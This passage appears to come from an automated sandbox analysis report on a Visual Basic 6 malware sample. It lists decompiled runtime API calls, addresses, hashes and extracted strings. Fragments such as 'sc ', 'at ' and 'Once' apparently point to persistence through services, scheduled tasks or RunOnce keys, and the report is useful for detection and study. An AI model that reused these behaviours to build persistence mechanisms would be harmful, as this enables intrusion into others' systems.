                                                                                    • Instruction Fuzzy Hash: 6FC17F71E001299BCF14DFA8D980AEEBBB5FF48304FA1819AD405B7240D775AD82CFA5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(00000000,Function_000032B6,?,?,?,?,0040B976,00000000), ref: 0041F5DE
                                                                                    • __vbaStrCopy.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041F60B
                                                                                    • __vbaFixstrConstruct.MSVBVM60(00000100,?,?,?,?,00000000,Function_000032B6), ref: 0041F61A
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0041F629
                                                                                    • __vbaStrToAnsi.MSVBVM60(00000001,Microsoft Internet Explorer,00000001,00000000,00000000,00000000,?,?,?,00000000,Function_000032B6), ref: 0041F647
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000,?,?,?,00000000,Function_000032B6), ref: 0041F656
                                                                                    • __vbaFreeStr.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041F665
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,00000000,00000000,80000000,00000000), ref: 0041F696
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000,00000000), ref: 0041F6A9
                                                                                    • __vbaStrToUnicode.MSVBVM60(?,?), ref: 0041F6B7
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0041F6C6
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,00000100,?), ref: 0041F6F5
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000,00000000), ref: 0041F705
                                                                                    • __vbaStrToUnicode.MSVBVM60(?,?), ref: 0041F713
                                                                                    • __vbaLsetFixstr.MSVBVM60(00000000,?,00000000), ref: 0041F720
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0041F730
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,00000100,00000000), ref: 0041F75E
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000,00000000), ref: 0041F76E
                                                                                    • __vbaStrToUnicode.MSVBVM60(?,?), ref: 0041F77C
                                                                                    • __vbaLsetFixstr.MSVBVM60(00000000,?,00000000), ref: 0041F789
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0041F799
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000), ref: 0041F7B4
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000), ref: 0041F7CA
                                                                                    • __vbaFreeStr.MSVBVM60(0041F811), ref: 0041F801
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0041F80A
                                                                                    Strings
                                                                                    • Microsoft Internet Explorer, xrefs: 0041F63E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Error$FreeSystem$Ansi$FixstrUnicode$ListLset$ChkstkConstructCopy
                                                                                    • String ID: Microsoft Internet Explorer
                                                                                    • API String ID: 4206449948-3125735337
                                                                                    • Opcode ID: cded7575dc80e55b3969bd68fd6dc42ddc0613399f5cdd5ea9fa15ec02432952
                                                                                    • Instruction ID: b2079e6668a1cd7a86d62b88bf03b67035dbb3734d396ffb12c1851edfe9c710
                                                                                    • Opcode Fuzzy Hash: cded7575dc80e55b3969bd68fd6dc42ddc0613399f5cdd5ea9fa15ec02432952
                                                                                    • Instruction Fuzzy Hash: 4561CB75900208EFDB04EFE4EE49FDEBB78AB48705F104169F611B61A0CB746A45CB65
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(?,Function_000032B6), ref: 0042935E
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,Function_000032B6), ref: 004293A3
                                                                                    • __vbaStrCopy.MSVBVM60(?,?,?,?,Function_000032B6), ref: 004293B8
                                                                                    • #712.MSVBVM60(?,file:///,00408114,00000001,000000FF,00000000,?,?,?,?,Function_000032B6), ref: 004293D9
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,?,Function_000032B6), ref: 004293E4
                                                                                    • #712.MSVBVM60(?,00409840,00406544,00000001,000000FF,00000000,?,?,?,?,Function_000032B6), ref: 00429405
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,?,Function_000032B6), ref: 00429410
                                                                                    • #572.MSVBVM60(00004002), ref: 00429469
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00429474
                                                                                    • #537.MSVBVM60(00000020), ref: 0042947F
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0042948A
                                                                                    • __vbaStrMove.MSVBVM60(00000001,000000FF,00000001), ref: 004294B6
                                                                                    • __vbaStrMove.MSVBVM60(004097E0,00000000), ref: 004294C8
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 004294CF
                                                                                    • __vbaStrMove.MSVBVM60 ref: 004294DA
                                                                                    • #712.MSVBVM60(?,00000000), ref: 004294E5
                                                                                    • __vbaStrMove.MSVBVM60 ref: 004294F0
                                                                                    • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,00000000,00000000), ref: 0042950C
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0042952E
                                                                                    • __vbaFreeStr.MSVBVM60(00429578), ref: 00429571
                                                                                    • __vbaErrorOverflow.MSVBVM60 ref: 004295A2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Move$#712$CopyErrorFree$#537#572ChkstkListOverflow
                                                                                    • String ID: $file:///
                                                                                    • API String ID: 1913684286-1087255347
                                                                                    • Opcode ID: 10574e520546cbbb49ac820470f987c6e6ae451a19177e6353396db4924bff4d
                                                                                    • Instruction ID: b77d49a70da6056938b5249be74374e1b73de407e439ef27e1b36e2e5139af87
                                                                                    • Opcode Fuzzy Hash: 10574e520546cbbb49ac820470f987c6e6ae451a19177e6353396db4924bff4d
                                                                                    • Instruction Fuzzy Hash: 6E510875E00209EBCB04DFA4DE48BDEBBB5FF08705F208269E512B72A0DB755A45CB58
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,00000020), ref: 0041ECA0
                                                                                      • Part of subcall function 0041F150: __vbaChkstk.MSVBVM60(00000000,Function_000032B6), ref: 0041F16E
                                                                                      • Part of subcall function 0041F150: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0041F19E
                                                                                      • Part of subcall function 0041F150: #537.MSVBVM60(00000000,?,?,?,00000000,Function_000032B6), ref: 0041F1AD
                                                                                      • Part of subcall function 0041F150: #606.MSVBVM60(000000FF,00000008), ref: 0041F1C6
                                                                                      • Part of subcall function 0041F150: __vbaStrMove.MSVBVM60 ref: 0041F1D1
                                                                                      • Part of subcall function 0041F150: __vbaFreeVar.MSVBVM60 ref: 0041F1DA
                                                                                      • Part of subcall function 0041F150: __vbaStrToAnsi.MSVBVM60(?,?), ref: 0041F1F5
                                                                                      • Part of subcall function 0041F150: __vbaSetSystemError.MSVBVM60(00000000), ref: 0041F201
                                                                                      • Part of subcall function 0041F150: __vbaStrToUnicode.MSVBVM60(?,?), ref: 0041F20F
                                                                                      • Part of subcall function 0041F150: __vbaFreeStr.MSVBVM60 ref: 0041F218
                                                                                      • Part of subcall function 0041F150: #537.MSVBVM60(00000000,?,00000001), ref: 0041F22D
                                                                                      • Part of subcall function 0041F150: __vbaStrMove.MSVBVM60 ref: 0041F238
                                                                                      • Part of subcall function 0041F150: __vbaInStr.MSVBVM60(00000000,00000000), ref: 0041F241
                                                                                      • Part of subcall function 0041F150: #616.MSVBVM60(?,-00000001), ref: 0041F251
                                                                                      • Part of subcall function 0041F150: __vbaStrMove.MSVBVM60 ref: 0041F25C
                                                                                      • Part of subcall function 0041F150: __vbaFreeStr.MSVBVM60 ref: 0041F265
                                                                                      • Part of subcall function 0041F150: __vbaFreeStr.MSVBVM60(0041F2A2), ref: 0041F29B
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 0041ECBB
                                                                                    • __vbaStrCmp.MSVBVM60(00408114,?), ref: 0041ECD1
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00409A70,?), ref: 0041ECF1
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041ECFC
                                                                                    • __vbaStrCmp.MSVBVM60(00000000), ref: 0041ED03
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0041ED1E
                                                                                    • __vbaStrCat.MSVBVM60(?,sc ), ref: 0041ED43
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041ED4E
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0041ED5C
                                                                                    • #600.MSVBVM60(00000008,00000000), ref: 0041ED7B
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0041ED8A
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 0041ED96
                                                                                    • __vbaStrCat.MSVBVM60(?,sc ), ref: 0041EDAC
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041EDB7
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0041EDC5
                                                                                    • #600.MSVBVM60(00000008,00000000), ref: 0041EDE4
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0041EDF3
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 0041EDFF
                                                                                      • Part of subcall function 0041A980: __vbaChkstk.MSVBVM60(00000000,Function_000032B6), ref: 0041A99E
                                                                                      • Part of subcall function 0041A980: __vbaStrCopy.MSVBVM60(?,00000000,?,00000000,Function_000032B6), ref: 0041A9CE
                                                                                      • Part of subcall function 0041A980: __vbaAryConstruct2.MSVBVM60(?,00408078,00000003,?,00000000,?,00000000,Function_000032B6), ref: 0041A9DF
                                                                                      • Part of subcall function 0041A980: __vbaOnError.MSVBVM60(000000FF,?,00000000,?,00000000,Function_000032B6), ref: 0041A9EE
                                                                                      • Part of subcall function 0041A980: __vbaSetSystemError.MSVBVM60(0000000F,00000000,?,00000000,?,00000000,Function_000032B6), ref: 0041AA0A
                                                                                      • Part of subcall function 0041A980: __vbaRecUniToAnsi.MSVBVM60(00405598,?,00000128), ref: 0041AA44
                                                                                      • Part of subcall function 0041A980: __vbaSetSystemError.MSVBVM60(?,00000000), ref: 0041AA5A
                                                                                      • Part of subcall function 0041A980: __vbaRecAnsiToUni.MSVBVM60(00405598,00000128,?), ref: 0041AA73
                                                                                      • Part of subcall function 0041A980: #525.MSVBVM60(00000104), ref: 0041AA9C
                                                                                      • Part of subcall function 0041A980: __vbaStrMove.MSVBVM60 ref: 0041AAA7
                                                                                      • Part of subcall function 0041A980: __vbaSetSystemError.MSVBVM60(00000410,00000000,?), ref: 0041AADE
                                                                                      • Part of subcall function 0041A980: __vbaStrToAnsi.MSVBVM60(?,00000000,000001F4), ref: 0041AB38
                                                                                    • __vbaSetSystemError.MSVBVM60(00000014,00000000), ref: 0041EE2B
                                                                                    • #598.MSVBVM60 ref: 0041EE38
                                                                                    • #611.MSVBVM60(00000000), ref: 0041EE47
                                                                                    • #661.MSVBVM60(?,00407C78,00000000,40000000,00000008), ref: 0041EE77
                                                                                    • #705.MSVBVM60(?,00000004), ref: 0041EE86
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041EE94
                                                                                    • __vbaStrCat.MSVBVM60(?,at ), ref: 0041EEB9
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041EEC4
                                                                                    • __vbaStrCat.MSVBVM60(004086A8,00000000), ref: 0041EED0
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041EEDB
                                                                                    • __vbaStrMove.MSVBVM60(00000000), ref: 0041EEEB
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 0041EEF2
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041EEFD
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0041EF0A
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041EF15
                                                                                    • __vbaStrCat.MSVBVM60("\\,00000000), ref: 0041EF21
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041EF2C
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0041EF3A
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041EF45
                                                                                    • __vbaStrCat.MSVBVM60(00406544,00000000), ref: 0041EF51
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041EF5C
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0041EF6A
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041EF78
                                                                                    • __vbaStrCat.MSVBVM60(00406544,00000000), ref: 0041EF84
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041EF92
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0041EF9F
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041EFAD
                                                                                    • __vbaStrCat.MSVBVM60(004095E4,00000000), ref: 0041EFB9
                                                                                    • #600.MSVBVM60(00000008,00000000), ref: 0041EFD8
                                                                                    • __vbaOnError.MSVBVM60(000000FF), ref: 0041F076
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000), ref: 0041F099
                                                                                    • __vbaSetSystemError.MSVBVM60(?), ref: 0041F0AF
                                                                                    • __vbaExitProc.MSVBVM60 ref: 0041F0B5
                                                                                    • __vbaFreeStr.MSVBVM60(0041F135), ref: 0041F12E
                                                                                    • __vbaErrorOverflow.MSVBVM60 ref: 0041F146
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Move$Error$Free$System$Ansi$#600$#537Chkstk$#525#598#606#611#616#661#705Construct2CopyExitOverflowProcUnicode
                                                                                    • String ID: sc
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040D164
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004082BC,0000004C), ref: 0040D197
                                                                                    • __vbaFreeObj.MSVBVM60 ref: 0040D1CF
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00406330,00000728), ref: 0040D22E
                                                                                    • __vbaChkstk.MSVBVM60(?), ref: 0040D264
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004077C4,00000020), ref: 0040D2A8
                                                                                    • __vbaObjSet.MSVBVM60(?,?), ref: 0040D2DB
                                                                                    • __vbaErrorOverflow.MSVBVM60 ref: 0040D522
                                                                                    • __vbaOnError.MSVBVM60(00000001), ref: 0040D56C
                                                                                    • __vbaNew2.MSVBVM60(00406520,0042CC34), ref: 0040D584
                                                                                    • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040D5A7
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004082BC,00000040), ref: 0040D5CB
                                                                                    • __vbaObjSet.MSVBVM60(?,?), ref: 0040D5E2
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00406510,0000000C), ref: 0040D5F8
                                                                                    • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0040D608
                                                                                    • __vbaExitProc.MSVBVM60 ref: 0040D611
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$CheckHresult$ErrorFree$ChkstkExitListNew2OverflowProc
                                                                                    • String ID:
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(?,Function_000032B6,?,?,?,660E6A76,660E6C30,?), ref: 00418D1E
                                                                                    • __vbaOnError.MSVBVM60(000000FF,00000000,?,?,?,Function_000032B6,?), ref: 00418D4E
                                                                                    • __vbaRecUniToAnsi.MSVBVM60(004054A0,?,?), ref: 00418D6E
                                                                                    • __vbaStrI4.MSVBVM60(00000000,00000000), ref: 00418D77
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00418D85
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,00000000), ref: 00418D93
                                                                                    • __vbaStrI4.MSVBVM60(00000000,00000000), ref: 00418D9C
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00418DAA
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,00000000), ref: 00418DB8
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,DISPLAY,00000000), ref: 00418DCB
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000), ref: 00418DDD
                                                                                    • __vbaRecAnsiToUni.MSVBVM60(004054A0,?,?), ref: 00418DF6
                                                                                    • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,?), ref: 00418E2D
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,004098D4,00000084), ref: 00418EAD
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,004098D4,0000008C), ref: 00418F3C
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,004098D4,00000278), ref: 00418FA4
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,004098D4,000000E0), ref: 00419013
                                                                                    • __vbaSetSystemError.MSVBVM60(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 0041905F
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,00CC0020), ref: 00419078
                                                                                    • __vbaErrorOverflow.MSVBVM60 ref: 004190C9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$AnsiError$CheckHresult$System$Move$ChkstkFreeListOverflow
                                                                                    • String ID: DISPLAY
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,?,0040CA73,80000002,00000000), ref: 0042A0AE
                                                                                    • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A0DB
                                                                                    • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A0E7
                                                                                    • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A0F3
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 0042A102
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004032B6), ref: 0042A11B
                                                                                    • __vbaSetSystemError.MSVBVM60(80000002,00000000,?,?,?,00000000,004032B6), ref: 0042A12B
                                                                                    • __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 0042A139
                                                                                    • __vbaFreeStr.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A142
                                                                                    • __vbaLenBstr.MSVBVM60(?,?,?,?,00000000,004032B6), ref: 0042A153
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,00000000,?,?,?,00000000,004032B6), ref: 0042A162
                                                                                    • __vbaStrToAnsi.MSVBVM60(00000001,?,00000000,00000001,00000000,?,?,?,00000000,004032B6), ref: 0042A175
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000,00000000,?,?,?,00000000,004032B6), ref: 0042A185
                                                                                    • __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 0042A193
                                                                                    • __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 0042A1A1
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,00000000,004032B6), ref: 0042A1B1
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,00000000,004032B6), ref: 0042A1CA
                                                                                    • __vbaFreeStr.MSVBVM60(0042A207,?,00000000,004032B6), ref: 0042A1EE
                                                                                    • __vbaFreeStr.MSVBVM60(?,00000000,004032B6), ref: 0042A1F7
                                                                                    • __vbaFreeStr.MSVBVM60(?,00000000,004032B6), ref: 0042A200
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Free$Error$AnsiCopySystemUnicode$BstrChkstkList
                                                                                    • String ID: @2@
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(00000000,Function_000032B6), ref: 0040D86E
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,00000000,Function_000032B6), ref: 0040D8B5
                                                                                    • __vbaStrCat.MSVBVM60( RO,00000000,?,00000000,Function_000032B6), ref: 0040D8ED
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000,Function_000032B6), ref: 0040D8F8
                                                                                    • __vbaStrCat.MSVBVM60(Once,00000000,00000000,00000000,?,00000000,Function_000032B6), ref: 0040D911
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000,Function_000032B6), ref: 0040D91C
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,00000000,80000002,00000000,?,00000000,Function_000032B6), ref: 0040D937
                                                                                    • __vbaStrCat.MSVBVM60( RO,00000000), ref: 0040D952
                                                                                    • __vbaStrMove.MSVBVM60(?,?,Function_000032B6), ref: 0040D95D
                                                                                    • __vbaStrCat.MSVBVM60(Once,00000000,00000000,00000000), ref: 0040D977
                                                                                    • __vbaStrMove.MSVBVM60(?,?,Function_000032B6), ref: 0040D982
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,00000000,80000002,00000000), ref: 0040D99D
                                                                                    • #580.MSVBVM60(00000000,00000027,00000000,00000000,0042C0F4,00000000,0042C0D4), ref: 0040DA0C
                                                                                    • __vbaStrCat.MSVBVM60( MR,00000000,0042C110,0042C114,0042C118,00000000,0042C0D4), ref: 0040DA33
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040DA3E
                                                                                    • __vbaFreeStr.MSVBVM60(00000000), ref: 0040DA4D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Move$Free$List$#580ChkstkError
                                                                                    • String ID: MR$ RO$C$Once
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaStrCat.MSVBVM60( !@,00409278,?,00000001), ref: 00415D70
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00415D7D
                                                                                    • __vbaStrCat.MSVBVM60(00409280,00000000,?,00000001), ref: 00415D85
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00415D8C
                                                                                    • __vbaInStr.MSVBVM60(00000000,00000000,?,00000001), ref: 00415D90
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,00000001), ref: 00415DA2
                                                                                    • __vbaStrCat.MSVBVM60( !@,004095AC,?,-00000001), ref: 00415DD0
                                                                                    • __vbaStrMove.MSVBVM60(?,-00000001), ref: 00415DD7
                                                                                    • __vbaStrCat.MSVBVM60(00409280,00000000,?,-00000001), ref: 00415DDF
                                                                                    • __vbaStrMove.MSVBVM60(?,-00000001), ref: 00415DE6
                                                                                    • __vbaInStr.MSVBVM60(00000000,00000000,?,-00000001), ref: 00415DEB
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,-00000001), ref: 00415DFD
                                                                                    • __vbaLenBstr.MSVBVM60 ref: 00415E10
                                                                                    • __vbaLenBstr.MSVBVM60(?,?), ref: 00415E43
                                                                                    • #631.MSVBVM60(?,-00000002,?,?), ref: 00415E59
                                                                                    • __vbaStrMove.MSVBVM60(?,-00000002,?,?), ref: 00415E64
                                                                                    • __vbaFreeVar.MSVBVM60(?,-00000002,?,?), ref: 00415E69
                                                                                    • __vbaErrorOverflow.MSVBVM60 ref: 00415EB9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Move$Free$BstrList$#631ErrorOverflow
                                                                                    • String ID: !@$AHA !@
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(00000000,Function_000032B6), ref: 0040CFFE
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0040D02E
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00406330,00000728), ref: 0040D081
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,004077C4,0000001C), ref: 0040D0C9
                                                                                    • __vbaI2I4.MSVBVM60 ref: 0040D0ED
